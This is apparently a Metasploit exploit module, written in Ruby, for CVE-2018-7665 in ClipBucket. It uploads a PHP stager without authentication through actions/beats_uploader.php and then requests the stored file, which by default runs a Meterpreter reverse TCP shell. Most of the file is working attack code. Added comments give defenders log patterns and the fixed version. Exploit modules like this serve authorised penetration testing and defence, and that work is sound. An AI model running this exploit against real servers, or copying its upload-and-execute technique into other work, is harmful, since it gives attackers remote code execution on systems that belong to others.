rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/http/clipbucket_fileupload_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
##
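# Metasploit module for CVE-2018-7665: an unauthenticated arbitrary file upload
# in ClipBucket's actions/beats_uploader.php.
#
# Defender notes, derived from the requests this module sends:
# * The upload is a multipart POST to <base>/actions/beats_uploader.php that
#   carries no credentials, with the form fields "file", "plupload" and "name".
# * The stored file is then requested with a GET below <base>/actions/, in the
#   directory the uploader reports, with a .php extension. A POST to the
#   uploader followed by a GET for a new .php file under actions/ is therefore
#   a useful pattern to look for in web server logs.
# * The description scopes the issue to versions before 4.0.0 (Release 4902),
#   so upgrading to that release or later is the expected fix (confirm against
#   the vendor advisory). Denying script execution in upload directories
#   limits the impact of this class of bug in general.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Registers the module metadata and the TARGETURI option.
  #
  # @param info [Hash] metadata supplied by the framework, merged through
  #   update_info with the values below
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "ClipBucket beats_uploader Unauthenticated Arbitrary File Upload",
        'Description' => %q{
          This module exploits a vulnerability found in ClipBucket versions before 4.0.0 (Release 4902).
          A malicious file can be uploaded using an unauthenticated arbitrary file upload vulnerability.
          It is possible for an attacker to upload a malicious script to issue operating system commands.
          This issue is caused by improper session handling in /action/beats_uploader.php file.
          This module was tested on ClipBucket before 4.0.0 - Release 4902 on Windows 7 and Kali Linux.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'www.sec-consult.com', # Vulnerability Discovery, PoC
          'Touhid M.Shaikh <admin[at]touhidshaikh.com>' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2018-7665' ],
          [ 'EDB', '44250' ]
        ],
        'DefaultOptions' => {
          'SSL' => false,
          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
          'Encoder' => 'php/base64'
        },
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'Targets' => [
          ['Clipbucket < 4.0.0 - Release 4902', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2018-03-03',
        'DefaultTarget' => 0,
        # NOTE(review): all three values are still UNKNOWN_*. exploit writes a
        # file under actions/ on the target and sends logged HTTP requests, so
        # the side-effect metadata (e.g. ARTIFACTS_ON_DISK, IOC_IN_LOGS) should
        # be filled in once verified.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
      ]
    )
  end

  # Base path of the ClipBucket installation, taken from TARGETURI.
  #
  # @return [String] the path component of target_uri
  def uri
    target_uri.path
  end

  # Fingerprints the target without uploading anything.
  #
  # Two GET requests are sent: <base>/readme must answer 200 with "ClipBucket"
  # in the body, and <base>/actions/beats_uploader.php must answer 200.
  #
  # @return [CheckCode] Unknown when a request gets no response, Safe when a
  #   probe does not match, Appears when both match. This is a presence check
  #   only; the installed version is never compared, so a patched install
  #   still reports Appears.
  def check
    vprint_status('Trying to detect ClipBucket on target.')

    # check for readme file
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, 'readme')
    })

    unless res
      vprint_error('Connection failed')
      return CheckCode::Unknown
    end

    unless res.code == 200 && res.body.include?('ClipBucket')
      vprint_error('Could not find readme')
      return CheckCode::Safe
    end

    # check for beats_uploader.php file
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, 'actions', 'beats_uploader.php')
    })

    unless res
      vprint_error('Connection failed')
      return CheckCode::Unknown
    end

    unless res.code == 200
      vprint_error('Could not find beats_uploader.php')
      return CheckCode::Safe
    end

    # Same constant the original reached through Exploit::CheckCode; spelled
    # like the other return values in this method for consistency.
    CheckCode::Appears
  end

  # Uploads the configured payload through beats_uploader.php and requests the
  # stored file.
  #
  # Aborts through fail_with when the upload request gets no response, when
  # the reply is not a 200 JSON object with "success" == "yes", or when the
  # reply lacks the stored file's directory or name.
  def exploit
    # Wrap the encoded payload in PHP tags.
    stager = "<?php #{payload.encode}?>"

    # Setting POST data. The arguments to add_part are positional:
    # (data, content_type, transfer_encoding, content_disposition).
    post_data = Rex::MIME::Message.new
    post_data.add_part(stager, 'application/octet-stream', nil, 'form-data; name="file"; filename="pfile.php"') # payload
    post_data.add_part('1', nil, nil, 'form-data; name="plupload"') # require for uploading
    post_data.add_part('agent22.php', nil, nil, 'form-data; name="name"')
    data = post_data.to_s

    print_status('Uploading payload..')
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'actions', 'beats_uploader.php'),
      'data' => data,
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
    })

    # send_request_cgi returns nil when no response arrives; check that before
    # touching the response, otherwise get_json_document raises NoMethodError.
    fail_with(Failure::Unreachable, "#{peer} - No response to the upload request") unless res

    jsonres = res.get_json_document

    # If the server returns 200 and success yes, we assume the file was stored.
    # The Hash check keeps a JSON array or scalar from raising on the lookup.
    unless res.code == 200 && jsonres.is_a?(Hash) && jsonres['success'] == 'yes'
      fail_with(Failure::UnexpectedReply, "#{peer} - File wasn't uploaded, aborting!")
    end

    print_good('Looking For Payload..')
    pdir = jsonres['file_directory']
    file_name = jsonres['file_name']
    pext = jsonres['extension'] # only reported below; the request path uses .php

    # These values come from the server's reply and are used to build the next
    # request path, so stop if they are missing instead of requesting a
    # malformed URI.
    if pdir.to_s.empty? || file_name.to_s.empty?
      fail_with(Failure::UnexpectedReply, "#{peer} - Upload response did not include the stored file location")
    end

    print_good("found payload in /actions/#{pdir}/#{file_name}.#{pext}")

    # Payload name
    pname = "#{file_name}.php"

    # Register the uploaded file with FileDropper so it is removed from the
    # target during cleanup instead of being left behind.
    register_files_for_cleanup(pname)

    print_status("Executing Payload [ #{uri}/actions/#{pdir}/#{pname} ]")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, 'actions', pdir, pname)
    })

    # Only a non-200 answer is reported; a missing response is not treated as
    # an error here, matching the original behaviour.
    print_error('Unexpected response, probably the exploit failed') if res && res.code != 200
  end
end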